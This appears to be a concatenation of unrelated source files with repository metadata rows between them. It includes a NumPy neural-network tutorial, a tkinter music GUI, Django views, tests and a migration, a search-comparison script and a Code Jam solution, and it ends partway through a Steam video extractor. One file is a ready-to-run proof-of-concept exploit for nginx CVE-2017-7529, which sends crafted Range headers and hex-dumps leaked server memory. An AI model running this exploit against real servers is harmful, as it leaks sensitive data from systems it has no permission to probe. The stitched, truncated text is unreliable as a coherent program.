dW1 = np.dot(dZ1, X.T) / m
db1 = np.sum(dZ1, axis = 1, keepdims = True) / m
grads = {"dW1": dW1,
"db1": db1,
"dW2": dW2,
"db2": db2}
return grads
"""
parameters, cache, X_assess, Y_assess = backward_propagation_test_case()
grads = backward_propagation(parameters, cache, X_assess, Y_assess)
print("dW1 = " + str(grads["dW1"]))
print("db1 = " + str(grads["db1"]))
print("dW2 = " + str(grads["dW2"]))
print("db2 = " + str(grads["db2"]))
"""
# function: update_parameters
def update_parameters(parameters, grads, learning_rate = 1.2):
"""
Updates parameters using the gradient descent update rule given above
Arguments:
parameters -- python dictionary containing your parameters
grads -- python dictionary containing your gradients
Returns:
paramters -- python dictionary containing your updated parameters
"""
# Retrieve each parameter from the dictionary "parameters"
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Retrieve each gradient from the dictionary "grads"
dW1 = grads["dW1"]
db1 = grads["db1"]
dW2 = grads["dW2"]
db2 = grads["db2"]
# Update rule for each parameter
W1 = W1 - learning_rate * dW1
b1 = b1 - learning_rate * db1
W2 = W2 - learning_rate * dW2
b2 = b2 - learning_rate * db2
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2}
return parameters
"""
parameters, grads = update_parameters_test_case()
parameters = update_parameters(parameters, grads)
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
"""
# Integrate parts 4.1, 4.2 and 4.3 in nn_model()
# function: nn_model
def nn_model(X, Y, n_h, num_iterations = 1000, print_cost = False):
"""
Arguments:
X -- dataset of shape (2, number of examples)
Y -- labels of shape (1, number of examples)
n_h -- size of the hidden layer
num_iterations -- Number of iterations in gradient descent loop
print_cost -- if True, print the cost every 1000 iterations
Returns:
parameters -- parameters learnt by the model. They can then be used to predict.
"""
np.random.seed(3)
n_x = layer_sizes(X, Y)[0]
n_y = layer_sizes(X, Y)[2]
# Initialize parameters, then retrieve W1, b1, W2, b2. Inputs: "n_x, n_h, n_y". Outputs = "W1, b1, W2, b2, parameters".
parameters = initialize_parameters(n_x, n_h, n_y)
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Loop (gradient descent)
for i in range(0, num_iterations):
# Forward propagation. Inputs: "X, parameters". Outputs: "A2, cache".
A2, cache = forward_propagation(X, parameters)
# Cost function. Inputs: "A2, Y, parameters". Outputs: "cost".
cost = compute_cost(A2, Y, parameters)
# Backpropagation. Inputs: "parameters, cache, X, Y". Output: "grads".
grads = backward_propagation(parameters, cache, X, Y)
# Gradient descent parameter update. Inputs: "parameters, grads". Outputs: "parameters".
parameters = update_parameters(parameters, grads)
# Print the cost every 1000 iterations
if print_cost and i % 1000 == 0:
print("Cost after iteration %i: %f" %(i, cost))
return parameters
"""
X_assess, Y_assess = nn_model_test_case()
parameters = nn_model(X_assess, Y_assess, 4, num_iterations = 10000, print_cost = True)
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
"""
# function: predict
def predict(parameters, X):
"""
Using the learned parameters, predict a class for each example in X
Arguments:
parameters -- python dictionary containing your parameters
X -- input data of size (n_x, m)
Returns:
predictions -- vector of predictions of our model (red: 0 / blue: 1)
"""
# Compute probabilities using forward propagation, and classifies to 0/1 using 0.5 as the threshold.
A2, cache = forward_propagation(X, parameters)
predictions = (A2 > 0.5)
return predictions
"""
parameters, X_assess = predict_test_case()
predictions = predict(parameters, X_assess)
print("predictions mean = " + str(np.mean(predictions)))
"""
"""
# Build a mdoel with a n_h-dimensional hidden layer
parameters = nn_model(X, Y, n_h = 4, num_iterations = 10000, print_cost = True)
# Plot the decision boundary
plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)
plt.title("Decision Boundary for hidden layer size " + str(4))
# Print accuracy
predictions = predict(parameters, X)
print("Accuracy: %d" % float ((np.dot(Y, predictions.T) + np.dot(1-Y, 1-predictions.T))/float(Y.size)*100) + "%")
"""
# 4.6-Tuning hidden layer size
plt.figure(figsize=(16, 32))
hidden_layer_sizes = [1, 2, 3, 4, 5, 20, 50]
for i, n_h in enumerate(hidden_layer_sizes):
plt.subplot(5, 2, i+1)
plt.title('Hidden Layer of size %d' % n_h)
parameters = nn_model(X, Y, n_h, num_iterations = 5000)
plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)
predictions = predict(parameters, X)
accuracy = float((np.dot(Y, predictions.T) + np.dot(1-Y, 1-predictions.T))/float(Y.size)*100)
print("Accuracy for {} hidden units: {} %".format(n_h, accuracy))
| [
"[email protected]"
] | |
865d163a7d8a6da2990f17d0e77042066fd1c459 | 519e3049819a86ea45dcfdd92d460844de411305 | /src/gui.py | 611b0cb0fadcf224d7402792bd0597afffc6c87b | [] | no_license | ArthurCamargo/ShowMusic | 4777dde5f05e26a27735f691566bcd80f014e1ef | c5d3b6ddd93c45b286638ecf6668e2181e0aec3f | refs/heads/master | 2023-01-12T07:45:57.987164 | 2020-11-23T02:25:24 | 2020-11-23T02:25:24 | 296,718,513 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,026 | py | """
File: gui.py
Author: Joao Martins
Email: [email protected]
Description:
Main module of the application, handles the graphical user interface
"""
import tkinter as tk
from tkinter.filedialog import askopenfilename, asksaveasfilename
from editor import Editor
from player import Player
from parser import Parser
from music import Music
class Gui(tk.Frame):
"""
Class that manages the GUI, windows, buttons
and visual elements in general
"""
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.grid()
self.editor = Editor(master)
self.music = Music()
self.player = Player()
self.parser = Parser(self.music)
self.create_widgets()
def operational_widgets(self):
""" Operational Widgets
Buttons:
Save: Saves the file
Open: Open the file
Quit: Quit the app"""
frame_op= tk.Frame(self, relief=tk.RAISED)
frame_op.grid(row = 9, column = 1)
save_button = tk.Button(self, text="Save", command=self.save_file)
open_button = tk.Button(self, text="Load", command=self.open_file)
quit_button = tk.Button(self, text="Quit", command=self.master.destroy)
quit_button.grid(row = 9, column = 2)
save_button.grid(row = 9, column = 3)
open_button.grid(row = 9, column = 4)
def save_file(self):
"""Save the current file as a new file."""
filepath = asksaveasfilename(
defaultextension="txt",
filetypes=[("Text Files", "*.txt"), ("All Files", "*.*")],
)
if not filepath:
return
with open(filepath, "w") as output_file:
text = self.editor.txt_area.get(1.0, tk.END)
output_file.write(text)
def compile(self):
""" Compile the current file to generate music. """
text = self.editor.txt_area.get(1.0, tk.END)
self.parser.text_area = text[:-1] #remove the last \n to avoid bugs
self.parser.parse()
self.music.generate()
self.player.load_music('../temp/sample.mid')
def open_file(self):
"""Open a file for editing."""
filepath = askopenfilename(
filetypes=[("Text Files", "*.txt"), ("All Files", "*.*")]
)
if not filepath:
return
self.editor.txt_area.delete(1.0, tk.END)
with open(filepath, "r") as input_file:
text = input_file.read()
self.editor.txt_area.insert(tk.END, text)
def load_config_file(self):
""" Load a configuration file into the application"""
filepath = askopenfilename(
filetypes=[("Text Files", "*.sm"), ("All Files", "*.*")]
)
if not filepath:
return
self.parser.load_configuration(filepath)
def music_widgets(self):
""" Music related Widgets
Buttons:
Play/Pause: Plays and pauses the music
Stop: Stop the music
Compile: Compile the song into the music"""
frame_music = tk.Frame(self, relief=tk.RAISED)
frame_music.grid(row = 10, column = 3)
play_pause_button = tk.Button(frame_music, text='Play',
command=self.player.play)
stop_button = tk.Button(frame_music, text='Stop',
command=self.player.stop)
compile_button = tk.Button(frame_music, text='Compile',
command=self.compile)
load_config_button = tk.Button(frame_music, text='Load Configuration',
command=self.load_config_file)
play_pause_button.grid(row = 0, column = 0)
stop_button.grid(row = 0, column = 1)
compile_button.grid(row = 0, column = 2)
load_config_button.grid(row = 0, column = 3)
def instruments_widgets(self):
""" Instrument related Widgets """
frame_instruments = tk.Frame(self, relief=tk.RAISED)
frame_instruments.grid(row = 0, column = 0)
#Images of the instruments
photo_harp = tk.PhotoImage(file = '../icons/grand-piano.png')
photo_tubular= tk.PhotoImage(file = '../icons/tubular.png')
photo_agogo= tk.PhotoImage(file = '../icons/agogo.png')
photo_flute= tk.PhotoImage(file = '../icons/pan-flute.png')
photo_organ= tk.PhotoImage(file = '../icons/organ.png')
harpsichord = tk.Label(frame_instruments, image=photo_harp,
compound = tk.CENTER, borderwidth=0)
tubular_bells = tk.Label(frame_instruments, image=photo_tubular,
compound = tk.CENTER, borderwidth=0)
agogo = tk.Label(frame_instruments, image=photo_agogo,
compound = tk.CENTER, borderwidth=0)
pan_flute = tk.Label(frame_instruments, image=photo_flute,
compound = tk.CENTER, borderwidth=0)
church_organ = tk.Label(frame_instruments, image=photo_organ,
compound = tk.CENTER, borderwidth=0)
#Images should be referenciated like that because of a known
#bug in tkinter http://effbot.org/pyfaq/why-do-my-tkinter-images-not-appear.htm
harpsichord.image = photo_harp
tubular_bells.image = photo_tubular
agogo.image = photo_agogo
church_organ.image= photo_organ
pan_flute.image = photo_flute
#Create the gris of the instruments
harpsichord.grid(row = 1, column = 0)
tubular_bells.grid(row = 2, column = 0)
agogo.grid(row = 3, column = 0)
pan_flute.grid(row = 4, column = 0)
church_organ.grid(row = 5, column = 0)
def create_widgets(self):
""" Create the gui widget of the application """
self.music_widgets()
self.instruments_widgets()
self.operational_widgets()
self.editor.draw_frame()
_app = Gui(tk.Tk())
_app.parser.load_configuration("../config/config.sm")
_app.mainloop()
| [
"[email protected]"
] | |
d48e81a28bb7684f2cc31d963b2adb56ac9aef3d | e8fce1e2e1737ed5e94eb2a47078509d4b733389 | /api/tests.py | 8e804679b264b5877ac973829c5b7fa5e74932b1 | [] | no_license | mohiz/test_djanog_decimal_field | 7d431166c18242d9295baaf7d8710d0feb85cbee | 490f6d40812a40847089eaefe06486e47e5bab02 | refs/heads/master | 2023-05-05T06:50:24.192599 | 2021-05-29T03:56:17 | 2021-05-29T03:56:17 | 371,870,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.test import TestCase
from django.db.models import F
from api.models import Foo
from decimal import Decimal
class TestSimple(TestCase):
def test_simple(self):
f = Foo.objects.create(amount=Decimal('0.5'))
f.amount = F('amount') - Decimal('0.4')
f.save(update_fields=['amount', ])
f.refresh_from_db()
self.assertEqual(
f.amount,
Decimal('0.1')
)
| [
"[email protected]"
] | |
c92862abb7710071303f4ecd25dce31b9f526d18 | bad8c0aed84630051d428d78aebb8e5f5cc1a67a | /core/views.py | 66c3fb32b2b44e3d33c517bf2f25098405094e7b | [] | no_license | dj999dash/Django-Auth | a383923d4cdfb9056a78232472b6ba6dd712bf6e | 1f340529670d5a676d435b03980b7b5f5240506a | refs/heads/master | 2022-12-24T18:57:48.334667 | 2020-10-02T13:48:23 | 2020-10-02T13:48:23 | 259,327,203 | 0 | 1 | null | 2020-10-02T13:48:24 | 2020-04-27T13:17:50 | Python | UTF-8 | Python | false | false | 758 | py | from django.shortcuts import render,redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
# Create your views here.
def home(request):
count = User.objects.count()
return render(request, 'home.html',{
'count':count
})
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = UserCreationForm()
return render(request,'registration/signup.html', {
'form': form
})
@login_required()
def secret_page(request):
return render(request,'secret_page.html') | [
"[email protected]"
] | |
db18f6260643739f1e162671d92c211770ddcff4 | e069f8d0013ab289048e20dfd5a2bcc8019841c9 | /06-organizacion-y-complejidad/07-graficos/busqueda.py | 1ac0f545e4a8551278ff297853822ea8bd2512e7 | [] | no_license | francosbenitez/unsam | 9981e8196e3a9abb1fb29c170d43c55beec5520a | 1390e3245ee3f9a3f4aa97146a80ed56fa72cd45 | refs/heads/main | 2023-08-14T03:16:15.183354 | 2021-09-21T13:58:21 | 2021-09-21T13:58:21 | 373,769,485 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,371 | py | """
Ejercicio 6.20: Búsqueda binaria vs. búsqueda secuencial
En este Ejercicio vamos a rehacer los gráficos del ejemplo anterior, pero primero cambiando el algoritmo de búsqueda y luego comparando ambos algoritmos.
Usando experimento_secuencial_promedio(lista, m, k) como base, escribí una función experimento_binario_promedio(lista, m, k) que cuente la cantidad de comparaciones que realiza en promedio (entre k experimentos elementales) la búsqueda binaria sobre la lista pasada como parámetro.
Graficá los resultados de estos experimentos para listas de largo entre 1 y 256.
Graficá ambas curvas en una misma figura, nombrando adecuadamente las curvas, los ejes y la figura completa. Jugá con xlim e ylim para visualizar bien las dos curvas, aunque tengas que restringir el rango.
¿Qué observas en estos gráficos? ¿Qué podés decir sobre la complejidad de cada algoritmo? ¿Son similares?
El código de este ejercicio guardalo en plot_bbin_vs_bsec.py.
"""
import random
import matplotlib.pyplot as plt
import numpy as np
def generar_lista(n, m):
l = random.sample(range(m), k = n)
l.sort()
return l
def generar_elemento(m):
return random.randint(0, m-1)
def busqueda_secuencial(lista, x):
'''Si x está en la lista devuelve el índice de su primera aparición,
de lo contrario devuelve -1.
'''
pos = -1
for i,z in enumerate(lista):
if z == x:
pos = i
break
return pos
def busqueda_secuencial_(lista, x):
'''Si x está en la lista devuelve el índice de su primera aparición,
de lo contrario devuelve -1. Además devuelve la cantidad de comparaciones
que hace la función.
'''
comps = 0
pos = -1
for i,z in enumerate(lista):
comps += 1
if z == x:
pos = i
break
return pos, comps
def experimento_secuencial_promedio(lista, m, k):
comps_tot = 0
for i in range(k):
x = generar_elemento(m)
comps_tot += busqueda_secuencial_(lista,x)[1]
comps_prom = comps_tot / k
return comps_prom
def busqueda_binaria(lista, x, verbose = False):
'''Búsqueda binaria
Precondición: la lista está ordenada
Devuelve -1 si x no está en lista;
Devuelve p tal que lista[p] == x, si x está en lista
'''
if verbose:
print(f'[DEBUG] izq |der |medio')
pos = -1
izq = 0
der = len(lista) - 1
while izq <= der:
medio = (izq + der) // 2
if verbose:
print(f'[DEBUG] {izq:3d} |{der:>3d} |{medio:3d}')
if lista[medio] == x:
pos = medio
if lista[medio] > x:
der = medio - 1
else:
izq = medio + 1
return pos
def busqueda_binaria_(lista, x, verbose = False):
'''Búsqueda binaria
Precondición: la lista está ordenada
Devuelve -1 si x no está en lista;
Devuelve p tal que lista[p] == x, si x está en lista
'''
if verbose:
print(f'[DEBUG] izq |der |medio')
pos = -1
izq = 0
der = len(lista) - 1
comps_tot = 0
while izq <= der:
comps_tot += 1
medio = (izq + der) // 2
if verbose:
print(f'[DEBUG] {izq:3d} |{der:>3d} |{medio:3d}')
if lista[medio] == x:
pos = medio
if lista[medio] > x:
der = medio - 1
else:
izq = medio + 1
return pos, comps_tot
def experimento_binario_promedio(lista, m, k):
comps_tot = 0
for i in range(k):
x = generar_elemento(m)
comps_tot += busqueda_binaria_(lista,x)[1]
comps_prom = comps_tot / k
return comps_prom
m = 10000
n = 100
k = 1000
lista = generar_lista(n, m)
m = 10000
k = 1000
largos = np.arange(256) + 1
comps_promedio_sec = np.zeros(256)
comps_promedio_bin = np.zeros(256)
for i, n in enumerate(largos):
lista = generar_lista(n, m)
comps_promedio_sec[i] = experimento_secuencial_promedio(lista, m, k)
comps_promedio_bin[i] = experimento_binario_promedio(lista, m, k)
plt.plot(largos,comps_promedio_sec,label = 'Búsqueda Secuencial')
plt.plot(largos,comps_promedio_bin,label = 'Búsqueda Binaria')
plt.xlabel("Largo de la lista")
plt.ylabel("Cantidad de comparaciones")
plt.title("Complejidad de la Búsqueda")
plt.legend()
plt.xscale("log")
plt.yscale("log")
plt.show()
| [
"[email protected]"
] | |
d2a1afd0b72a8d69f17d62a5263ac72b31a5afa7 | 5e84378aa01c773e9080c3e63a48857887ade95d | /2017/CVE-2017-7529/exp&poc/CVE-2017-7529_PoC/CVE-2017-7529_PoC.py | bb2422b8d0b83d85eeef9c15d0f787f2862303e5 | [] | no_license | tdcoming/Vulnerability-engine | ed9a9634923296ac4b241005c085c0a7e51b36ed | 15f872fab2ede9a7f07edd7a85298444593bd10e | refs/heads/master | 2020-08-02T11:52:09.331001 | 2019-11-20T02:08:12 | 2019-11-20T02:08:12 | 211,341,603 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,758 | py |
import urllib.parse, requests, argparse
global colorama, termcolor
try:
import colorama, termcolor
colorama.init(autoreset=True)
except Exception as e:
termcolor = colorama = None
colored = lambda text, color="", dark=False: termcolor.colored(text, color or "white", attrs=["dark"] if dark else []) if termcolor and colorama else text
class Exploit(requests.Session):
buffer = set()
def __init__(self, url):
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
super().__init__()
self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
self.target = urllib.parse.urlsplit(url)
def check(self):
try:
response = self.get(self.target.geturl())
return response.status_code == 206 and "Content-Range" in response.text
except Exception as e:
return False
def hexdump(self, data):
for b in range(0, len(data), 16):
line = [char for char in data[b: b + 16]]
print(colored(" - {:04x}: {:48} {}".format(b, " ".join(f"{char:02x}" for char in line), "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)), dark=True))
def execute(self):
vulnerable = self.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
if vulnerable:
data = b""
while len(self.buffer) < 0x80:
try:
response = self.get(self.target.geturl())
for line in response.content.split(b"\r\n"):
if line not in self.buffer:
data += line
self.buffer.add(line)
except Exception as e:
print()
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
break
except KeyboardInterrupt:
print()
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
break
print(colored(f"[i] Receiving Data [{len(data)} bytes] ..."), end = "\r")
if data:
print()
self.hexdump(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog = "CVE-2017-7529",
description = "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.",
epilog = "By: en0f")
parser.add_argument("url", type = str, help = "Target URL.")
parser.add_argument("-c", "--check", action = "store_true", help = "Only check if Target is vulnerable.")
args = parser.parse_args()
try:
exploit = Exploit(args.url)
if args.check:
vulnerable = exploit.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
else:
try:
exploit.execute()
except Exception as e:
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
except KeyboardInterrupt:
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
except Exception as e:
print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).__name__}", "red")) | [
"[email protected]"
] | |
2d984a6ee6334fda894e19382b98c8e37fc75eca | 850df0e1666ec735939d20e1baf234760513bc7d | /account/migrations/0005_auto_20201128_1523.py | 0133dfbda1e3290a939df5b464038cb91f920378 | [] | no_license | aoi797airplane/platform | 3f6f8a1107786d9751b3b263eb699a2680b6bc52 | a3580546d313689b8e4b7e5971337e5c617845f5 | refs/heads/master | 2023-01-27T12:57:40.301335 | 2020-12-04T05:45:24 | 2020-12-04T05:45:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 450 | py | # Generated by Django 3.1.3 on 2020-11-28 06:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_remove_ea_ea'),
('account', '0004_profile_ea'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='ea',
field=models.ManyToManyField(blank=True, to='main.Ea', verbose_name='EA'),
),
]
| [
"[email protected]"
] | |
954e3ab168d4fbcd0be402006fa505131279c73f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_199/545.py | 17c70db8eec59ac875b8c95e77f7983acaabe002 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,267 | py | import sys
numTests = int(sys.stdin.readline())
tests = []
def isAllFlipped(pancakes, i, j):
for k in range(i, j):
if(pancakes[k]=='-'):
return False
return True
# Read all tests
for i in range(numTests):
t = sys.stdin.readline()
s = t.split(' ')
tests.append(s)
# Solve them
for i in range(numTests):
s = tests[i]
pancakes = list(s[0])
pancakesLen = len(pancakes)
fliperSize = int(s[1])
# base case
if fliperSize > pancakesLen:
if isAllFlipped(pancakes, 0, pancakesLen):
print 'Case #' + str(i+1) + ': 0'
else:
print 'Case #' + str(i+1) + ': IMPOSSIBLE'
continue
# tries to solve flipping from left to right
totalFlips = 0
for j in range(0, (pancakesLen-fliperSize+1)):
if pancakes[j] == '-':
totalFlips += 1
for k in range(j, (j+fliperSize)):
if pancakes[k] == '-':
pancakes[k] = '+'
else:
pancakes[k] = '-'
# check and print result
if isAllFlipped(pancakes, (pancakesLen-fliperSize+1), pancakesLen):
print 'Case #' + str(i+1) + ': ' + str(totalFlips)
else:
print 'Case #' + str(i+1) + ': IMPOSSIBLE'
| [
"[email protected]"
] | |
da64e9293511b13a8336e14e96b3c5358d59ea74 | a7252408048aaca7a30376d70ef7d02021aa7ec4 | /todolist/views.py | 9a008f813b0286d1311fe981e03874aed28fc4e0 | [] | no_license | wanZzz6/to_do_list | 2333f4fee8762d4c41c71d471a47cca6b2e6c8b4 | 2580f37fc9b8aa3c8aea3ac7843615eda1ce703f | refs/heads/master | 2020-04-23T15:55:38.859389 | 2019-02-18T12:48:36 | 2019-02-18T12:48:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | from django.shortcuts import render, redirect
# Create your views here.
lst = [{'待办事项': '遛狗', '已完成': False},
{'待办事项': '遛狗啊', '已完成': True}, ]
def home(request):
global lst
if request.method == 'POST':
content = request.POST.get('待办事项')
if content:
lst.append({'待办事项': content, '已完成': False})
content = {'清单': lst, '信息':'添加成功!'}
return render(request, 'todolist/home.html', content)
else:
return render(request, 'todolist/home.html', {'警告': '请输入内容', '清单':lst})
else:
content = {'清单': lst}
return render(request, 'todolist/home.html', content)
def edit(request, forloop_counter):
global lst
if request.method == 'POST':
if request.POST.get('已修改事项') == '':
return render(request, 'todolist/edit.html', {'警告':'请输入内容'})
else:
lst[int(forloop_counter) - 1]['待办事项'] = request.POST['已修改事项']
return redirect('todolist:主页')
else:
content = lst[int(forloop_counter) - 1]['待办事项']
return render(request, 'todolist/edit.html',{'待修改事项':content, 'num':forloop_counter})
def about(request):
return render(request, 'todolist/about.html')
def delate(request, forloop_counter):
lst.pop(int(forloop_counter) - 1)
return redirect('todolist:主页')
def cross(request, forloop_counter):
global lst
if request.POST['完成状态'] == '已完成':
lst[(int(forloop_counter) - 1)]['已完成'] = True
return redirect('todolist:主页')
else:
lst[(int(forloop_counter) - 1)]['已完成'] = False
return redirect('todolist:主页')
| [
"[email protected]"
] | |
5dd940e274d09977d0920ec34c29c7b99498bef7 | ee974d693ca4c4156121f8cb385328b52eaac07c | /env/lib/python3.6/site-packages/dmlc_tracker/ssh.py | 131a020cf5e48c39da5177ddf3388d3dae91a560 | [] | no_license | ngonhi/Attendance_Check_System_with_Face_Recognition | f4531cc4dee565d0e45c02217f73f3eda412b414 | 92ff88cbc0c740ad48e149033efd38137c9be88d | refs/heads/main | 2023-03-12T07:03:25.302649 | 2021-02-26T15:37:33 | 2021-02-26T15:37:33 | 341,493,686 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a98dbbfdf7c695ce9963e992b64966e8030206b0403401776879363101369004
size 3155
| [
"Nqk180998!"
] | Nqk180998! |
f24b3f14135d3f1b45ea5d6db99c90f6f40d2065 | 4e009430fa206297f5bb187beeca5e2fac0c65ad | /pycharmprojects/day02/while_guess.py | de74acd00a1c34036169f8b0ffb9e45b459c1dca | [] | no_license | xzp820017462/node | 6b7e70a45f59652a5147656c9e266e674a688666 | a398cf36eb396ca1e15e548200f7bc2fc8b4f1a8 | refs/heads/master | 2020-03-26T08:10:01.582952 | 2018-08-18T00:38:58 | 2018-08-18T00:38:58 | 144,689,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | import random
all_choices = ['拳头', '剪刀', '布']
win_list = [['拳头', '剪刀'], ['剪刀', '布'], ['布', '拳头']]
prompt = """(0)拳头
(1)布
(2)剪刀
"""
computer = random.choice(all_choices)
running =True
while True :
ind = int(input(prompt))
player = all_choices[ind]
print('你出了: %s, 计算机出的是: %s' % (player, computer))
if player == computer :
print("平局")
elif [player, computer]:
print("你赢")
else:
print("你输")
running = False | [
"[email protected]"
] | |
e598d2d16f4d4fd929f60c9f86001ae28269eed5 | 2f168497605c0540ec26406d87ef0ea6c806c72d | /year/serializers.py | e26ac3ceaf997d4d682b2ccfe8b1fff9523c5cd0 | [
"MIT"
] | permissive | djs2082/AttendanceSystem | 4d94301f861d27fce00cf5517e001ec003d100ce | b775b969585239a5fe756b8367c5ac8994d4e347 | refs/heads/master | 2022-12-02T12:52:29.113208 | 2020-08-19T13:06:04 | 2020-08-19T13:06:04 | 286,905,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | from rest_framework import serializers
from year.models import Year
from rest_framework.validators import UniqueValidator
class YearSerializer(serializers.ModelSerializer):
class Meta:
model=Year
fields=('__all__')
extra_kwargs={
'yearName': {
'validators': [UniqueValidator(queryset = model.objects.all())],
}
}
| [
"[email protected]"
] | |
74ef4e4b15c58a54c7e14377a511efc4bd38750d | 480669ba61d1c8009bd62cebbbd8fc8998431015 | /home/admin.py | a5d5bf683bcf6870c300cbdddc663f1b5577e28a | [] | no_license | anirudhasj441/online_assignment_system | cbfe5cc058d2d42227f4f3d2530e08fc0d24171b | 521e052d33711c5416a91b5a2dc110a14ddd8d59 | refs/heads/master | 2022-12-06T15:16:23.442614 | 2020-08-26T09:37:40 | 2020-08-26T09:37:40 | 282,669,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,277 | py | from django.contrib import admin
from .models import Teacher,Student,Class,Subject
# Register your models here.
class StudentAdmin(admin.ModelAdmin):
list_filter = [
's_class'
]
list_display = [
'pk',
'name',
'control_number',
's_class',
's_roll',
'email',
's_contact',
]
def name(self,obj):
return obj.user.first_name+' '+obj.user.last_name
def control_number(self,obj):
return obj.user.username
def email(self,obj):
return obj.user.email
class TeacherAdmim(admin.ModelAdmin):
list_display = [
'pk',
'name',
'control_number',
'email',
't_contact'
]
def name(self,obj):
return obj.user.first_name+' '+obj.user.last_name
def control_number(self,obj):
return obj.user.username
def email(self,obj):
return obj.user.email
class ClassAdmin(admin.ModelAdmin):
list_display = [
"pk",
"class_name",
"strength",
]
class SubjectAdmin(admin.ModelAdmin):
list_display = [
"pk",
"subject_name",
"class_name"
]
list_filter = [
"class_name"
]
admin.site.register(Student,StudentAdmin)
admin.site.register(Teacher,TeacherAdmim)
admin.site.register(Class,ClassAdmin)
admin.site.register(Subject,SubjectAdmin)
| [
"[email protected]"
] | |
358bf5ff959ce6c82c82df8e666dc0a2879cd61b | 1f2c16ee42b06479e7aed311d929ffe2aa4a9e41 | /question1.py | d727f54736a5c7db95de2cc7937a314919e8217e | [] | no_license | jed1337/web-scraper-analytics | 0574d28aee9c51aa7896a681ef815b2fd35896d9 | 0de007dc55c75fd6160d31cea8f2e2a5c086ad3b | refs/heads/master | 2020-09-21T12:52:36.700765 | 2019-11-29T15:22:04 | 2019-11-29T15:22:04 | 224,795,059 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import seaborn as sns
import csv
def question1():
data = pd.read_csv("consolidated.csv")
top_artists = data[['Artist and Title', 'Year', 'TPts']].sort_values(by=['Year','TPts'],ascending=False).groupby(['Year']).head(5)
print(top_artists.groupby('Artist and Title')['Year'].count())
| [
"[email protected]"
] | |
59fef5c3b034663423b8dcd197f814b2bf15509a | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/pyi/parsing/Simple.pyi | c3ae82f555c05e75c0e78ae12a54514a47b72b29 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 28 | pyi | def foo(x: int) -> int: ...
| [
"[email protected]"
] | |
a04b8e2cc982c8c13aa5fbb2315a80ff68b48f1c | 10717fe6f68c4ee9bcf27ee62e89581f4a030b8e | /extractor/steam.py | 97a2992bab81e6e997b23532c28022998d9aaf8c | [] | no_license | HagerHosny199/Testing_Project | ff7f9a54b7a213c9d9ade0c5192845c2a29adc8b | 9bc170263e239cc24ccfb2aa33b9913ff799ffe9 | refs/heads/master | 2020-05-17T20:57:01.750640 | 2019-05-08T22:13:06 | 2019-05-08T22:13:06 | 183,954,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,644 | py | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from utils import (
extract_attributes,
ExtractorError,
get_element_by_class,
js_to_json,
)
class SteamIE(InfoExtractor):
_VALID_URL = r"""(?x)
https?://store\.steampowered\.com/
(agecheck/)?
